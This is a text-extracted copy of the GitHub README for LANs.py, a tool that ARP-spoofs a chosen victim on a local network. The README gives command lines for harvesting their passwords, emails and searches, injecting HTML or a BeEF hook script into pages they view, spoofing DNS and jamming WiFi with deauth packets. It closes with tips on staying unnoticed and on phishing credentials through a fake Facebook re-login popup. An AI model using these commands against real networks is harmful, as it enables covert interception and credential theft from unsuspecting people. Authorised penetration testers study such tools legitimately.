Professional Documents
Culture Documents
DanMcInerney LANs
DanMcInerney LANs
DanMcInerney/LANs.py GitHub
Thisrepository
Explore
Search
Features
Enterprise
DanMcInerney / LANs.py
Blog
Watch
Signup
121
Star
1,326
Signin
Fork
164
Injectcode,jamwifi,andspyonwifiusers
Code
165commits
branch:master
1branch
0releases
12contributors
LANs.py/
Issues
Pullrequests
UpdateREADME.md
DanMcInerneyauthoredonMar4
latestcommit5a17c83146
.gitignore
betterinterfacedetectionifnotspecified
5monthsago
LANs.py
cleanedupthecode
2monthsago
LICENSE
changedtoGPL
5monthsago
README.md
UpdateREADME.md
requirements.txt
addedrequirements.txt
amonthago
3monthsago
README.md
Pulse
Graphs
HTTPScloneURL
https://github.com/Da
nMcInerney/LA
YoucanclonewithHTTPSor
Subversion.
DownloadZIP
IfyouhaveanyissuesrunningthisscriptI'dsuggestcheckingoutMITMfwhichdoesallthesame
things+more.Eventuallythisscriptneedstoberewrittenwithnetcredsastheengine.
LANs.py
AutomaticallyfindthemostactiveWLANusersthenspyononeofthemand/orinjectarbitrary
HTML/JSintopagestheyvisit.
IndividuallypoisonstheARPtablesofthetargetbox,therouterandtheDNSserverif
necessary.Doesnotpoisonanyoneelseonthenetwork.Displaysallmosttheinterestingbits
oftheirtrafficandcaninjectcustomhtmlintopagestheyvisit.Cleansupafteritself.
AlsocanbeusedtocontinuouslyjamnearbyWiFinetworks.Thishasanapproximaterangeofa
1blockradius,butthiscanvarybasedoffofthestrengthofyourWiFicard.Thiscanbefinetuned
toallowjammingofeveryoneorevenjustoneclient.CannotjamWiFiandspysimultaneously.
Prerequisites:Linux,pythonscapy,pythonnfqueue(nfqueuebindings0.43),aircrackng,python
twisted,BeEF(optional),nmap,nbtscan,tcpdump,andawirelesscardcapableofpromiscuousmode
ifyoudon'tknowtheIPofyourtarget.
TestedonKali.Inthefollowingexamples192.168.0.5willbetheattackingmachineand192.168.0.10
willbethevictim.
Alloptions:
PythonLANs.py[h][bBEEF][cCODE][u][ipIPADDRESS][vmacVICTIMMAC]
[d][v][dnsDNSSPOOF][a][set][p][na][n]
[iINTERFACE][rREDIRECTTO][ripROUTERIP]
[rmacROUTERMAC][pcapPCAP][sSKIP][chCHANNEL]
[mMAXIMUM][no][tTIMEINTERVAL][packetsPACKETS]
[directedonly][accesspointACCESSPOINT]
https://github.com/DanMcInerney/LANs.py
1/5
4/11/2015
DanMcInerney/LANs.py GitHub
Usage
Commonusage:
pythonLANs.pyup
ActivetargetidentificationwhichARPspoofsthechosentargetandoutputsalltheinterestingnon
HTTPSdatatheysendorrequest.There'snoipoptionsothiswillARPscanthenetwork,compareit
toaliverunningpromiscuouscapture,andlistalltheclientsonthenetwork.Attemptstotagthe
targetswithaWindowsnetbiosnameandprintshowmanydatapacketstheyaresending/receiving.
Theabilitytocapturedatapacketstheysendisverydependentonphysicalproximityandthepowerof
yournetworkcard.CtrlCwhenyou'rereadyandpickyourtargetwhichitwillthenARPspoof.
Supportsinterceptionandharvestingofdatafromthefollowingprotocols:HTTP,FTP,IMAP,POP3,
IRC.Willprintthefirst135charactersofURLsvisitedandignoreURLsendingin.jpg,.jpeg,.gif,.css,
.ico,.js,.svg,and.woff.Willalsoprintallprotocolusername/passwordsentered,searchesmadeon
anysite,emailssent/received,andIRCmessagessent/received.Screenshot:
http://i.imgur.com/kQofTYP.png
RunningLANs.pywithoutargumentwillgiveyouthelistofactivetargetsanduponselectingone,itwill
actasasimpleARPspoofer.
Anothercommonusage:
pythonLANs.pyupdip192.168.0.10
d:openanxtermwithdriftnettoseeallimagestheyview
ip:targetthisIPaddressandskiptheactivetargetingatthebeginning
HTMLinjection:
pythonLANs.pybhttp://192.168.0.5:3000/hook.js
InjectaBeEFhookURL(http://beefproject.com/,tutorial:http://resources.infosecinstitute.com/beef
part1/)intopagesthevictimvisits.Thisjustwrapstheargumentin
<script>
tagssoyoucanreally
enteranylocationofajavascriptfile.Attemptstoinsertitafterthefirsttagfoundinthepage'sHTML.
pythonLANs.pyc'<title>Owned.</title>'
InjectarbitraryHTMLintopagesthevictimvisits.Firsttriestoinjectitafterthefirst
<head>
tagand
failingthat,injectspriortothefirst
</head>
tag.Thisexamplewillchangethepagetitleto'Owned.'
Readfrompcap:
pythonLANs.pypcaplibpcapfilenameip192.168.0.10
Toreadfromapcapfileyoumustincludethetarget'sIPaddresswiththeipoption.Itmustalsobein
https://github.com/DanMcInerney/LANs.py
2/5
4/11/2015
DanMcInerney/LANs.py GitHub
libpcapformwhichisthemostcommonanyway.Oneadvantageofreadingfromapcapfileisthatyou
donotneedtoberoottoexecutethescript.
DNSspoofing
pythonLANs.pyar80.87.128.67
pythonLANs.pydnseff.org
Example1:TheaoptionwillspoofeverysingleDNSrequestthevictimmakesandwhenusedin
conjuctionwithritwillredirectthemtor'sargumentaddress.Thevictimwillberedirectedto
stallman.org(80.87.128.67)nomatterwhattheytypeintheaddressbar.
Example2:Thiswillspoofthedomaineff.organdsubdomainsofeff.org.Whenthereisnorargument
presentwiththeaordnsargumentsthescriptwilldefaulttosendingthevictimtotheattacker'sIP
address.Ifthevictimtriestogotoeff.orgtheywillberedirectedtotheattacker'sIP.
Mostaggressiveusage:
pythonLANs.pyvdpnnasetar80.87.128.67c'<title>Owned.</title>'bhttp://192.168.0.5:3000/hook.jsip1
JamallWiFinetworks:
pythonLANs.pyjam
Jamjustoneaccesspoint(router)
pythonLans.pyjamaccesspoint01:MA:C0:AD:DY
Alloptions:
NormalUsage:
bBEEF_HOOK_URL:copytheBeEFhookURLtoinjectitintoeverypagethevictimvisits,eg:b
http://192.168.1.10:3000/hook.js
c'HTMLCODE':injectarbitraryHTMLcodeintopagesthevictimvisitsincludethequoteswhen
selectingHTMLtoinject
d:openanxtermwithdriftnettoseeallimagestheyview
dnsDOMAIN:spooftheDNSofDOMAIN.e.g.dnsfacebook.comwillDNSspoofeveryDNS
requesttofacebook.comorsubdomain.facebook.com
a:SpoofeveryDNSresponsethevictimmakes,effectivelycreatingacaptiveportalpager
optioncanbeusedwiththis
rIPADDRESS:onlytobeusedwiththednsDOMAINoptionredirecttheusertothis
IPADDRESSwhentheyvisitDOMAIN
u:printsURLsvisitedtruncatesat150charactersandfiltersimage/css/js/woff/svgurlssincethey
spamtheoutputandareuninteresting
iINTERFACE:specifyinterfacedefaultisfirstinterfacein
iproute
,eg:iwlan0
ip:targetthisIPaddress
n:performsaquicknmapscanofthetarget
https://github.com/DanMcInerney/LANs.py
3/5
4/11/2015
DanMcInerney/LANs.py GitHub
na:performsanaggressivenmapscaninthebackgroundandoutputsto[victimIP
address].nmap.txt
p:printusername/passwordsforFTP/IMAP/POP/IRC/HTTP,HTTPPOSTsmade,allsearches
made,incoming/outgoingemails,andIRCmessagessent/received
pcapPCAP_FILE:parsethroughallthepacketsinapcapfilerequirestheip[target'sIP
address]argument
rmacROUTER_MAC:enterrouterMAChereifyou'rehavingtroublegettingthescriptto
automaticallyfetchit
ripROUTER_IP:enterrouterIPhereifyou'rehavingtroublegettingthescripttoautomatically
fetchit
v:showverboseURLswhichdonottruncateat150characterslikeu
jam:jamallorsome2.4GHzwirelessaccesspointsandclientsinrangeuseargumentsbelow
inconjunctionwiththisargumentifnecessary
WifiJamming:
sMAC_Address_to_skip:SpecifyaMACaddresstoskipdeauthing.Example:s
00:11:BB:33:44:AA
chCHANNEL:Limitwifijammertosinglechannel
mMAXIMUM:Maximumnumberofclientstodeauth.Useifmovingaroundsoastoprevent
deauthingclient/APpairsoutsideofcurrentrange.
no:Donotclearthedeauthlistwhenthemaximum(m)numberofclient/APcombosisreached.
Mustbeusedinconjunctionwithm.Example:m10n
tTIME_INTERVAL:Timebetweeneachdeauthpacket.Defaultismaximum.Ifyouseescapy
errorslike'nobufferspace'try:t.00001
packetsNUMBER:Numberofpacketstosendineachdeauthburst.Defaultis1packet.
directedonly:Don'tsenddeauthpacketstothebroadcastaddressofAPsandonlysendto
client/APpairs
accesspointROUTER_MAC:EntertheMACaddressofaspecificAPtotarget.
Cleanup
UponreceivingaCtrlC:
TurnsoffIPforwarding
Flushesiptablesfirewall
Individuallyrestorestherouterandvictim'sARPtables
Technicaldetails
ThisscriptusesapythonnfqueuebindingsqueuewrappedinaTwistedIReadDescriptortofeed
packetstocallbackfunctions.nfqueuebindingsisusedtodropandforwardcertainpackets.Python's
scapylibrarydoestheworktoparseandinjectpackets.
Injectingcodeundetectedisadiceygame,ifaminorthinggoeswrongortheserverthevictimis
requestingdatafromperformsthingsinuniqueorrarewaythentheuserwon'tbeabletoopenthe
pagethey'retryingtoviewandthey'llknowsomething'sup.Thisscriptisdesignedtoforwardpackets
ifanythingfailssoduringusageyoumayseelotsof"[!]Injectedpacketforwww.domain.com"butonly
seeoneortwodomainsontheBEeFpanelthatthebrowserishookedon.ThisisOK.Iftheydon'tget
hookedonthefirstpagejustwaitforthemtobrowseafewotherpages.Thegoalistobe
unnoticeable.MyfavoriteBEeFtoolsareinCommands>SocialEngineering.Dothingslikecreatean
officiallookingFacebookpopupsayingtheuser'sauthenticationexpiredandtoreentertheir
https://github.com/DanMcInerney/LANs.py
4/5
4/11/2015
DanMcInerney/LANs.py GitHub
credentials.
danmcinerney.org
analytics GA
https://github.com/DanMcInerney/LANs.py
5/5